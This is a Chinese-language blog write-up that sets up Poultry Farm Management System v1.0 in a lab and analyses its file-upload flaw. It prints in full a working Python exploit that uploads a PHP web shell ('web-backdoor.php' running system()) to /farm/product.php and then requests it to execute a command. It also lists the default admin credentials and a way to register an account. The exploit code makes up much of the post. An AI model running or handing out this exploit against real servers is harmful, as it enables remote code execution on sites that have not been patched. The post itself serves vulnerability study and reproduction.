环境搭建
系统版本:Poultry Farm Management System v1.0
源码下载地址:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
运行环境:
Phpstudy
先创建一个名为farm的数据库,然后导入数据,数据库文件在database目录下
再将自己数据库的账号密码填入对应位置
然后访问网站
默认的账号密码是 ndbhalerao91@gmail.com admin
漏洞分析
网站搭建起来后,看下漏洞位置
exploit-db只给了一个Python的利用代码,我们从代码里看下漏洞点在哪
import requests
from colorama import Fore, Style, init
# Initialize colorama
init(autoreset=True)
def upload_backdoor(target):
upload_url = f"{target}/farm/product.php"
shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php"
# Prepare the payload
payload = {
'category': 'CHICKEN',
'product': 'rce',
'price': '100',
'save': ''
}
# PHP code to be uploaded
command = "hostname"
data = f"<?php system('{command}');?>"
# Prepare the file data
files = {
'productimage': ('web-backdoor.php', data, 'application/x-php')
}
try:
print("Sending POST request to:", upload_url)
response = requests.post(upload_url, files=files, data=payload,
verify=False)
if response.status_code == 200:
print("\nResponse status code:", response.status_code)
print(f"Shell has been uploaded successfully: {shell_url}")
# Make a GET request to the shell URL to execute the command
shell_response = requests.get(shell_url, verify=False)
print("Command output:", Fore.GREEN +
shell_response.text.strip())
else:
print(f"Failed to upload shell. Status code:
{response.status_code}")
print("Response content:", response.text)
except requests.RequestException as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
target = "http://localhost" # Change this to your target
upload_backdoor(target)
第九行是漏洞所在的文件,第十行是上传文件的路径,payload是post请求的参数,21行是上传文件的内容,23行是上传文件的类型和文件名,然后29行用requests库上传文件
现在漏洞文件位置和参数都找到了
位置:/farm/product.php
参数:productimage
然后去代码里看下
第十行没有做任何过滤,直接将接收到的文件移动到assets/img/productimages/目录下
再看下上面的检测登录的代码
直接从session里取值判断是否登录,找了下其他的代码,直接访问http://ip/register.php 应该是可以注册账号的。
扫一扫
8135
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
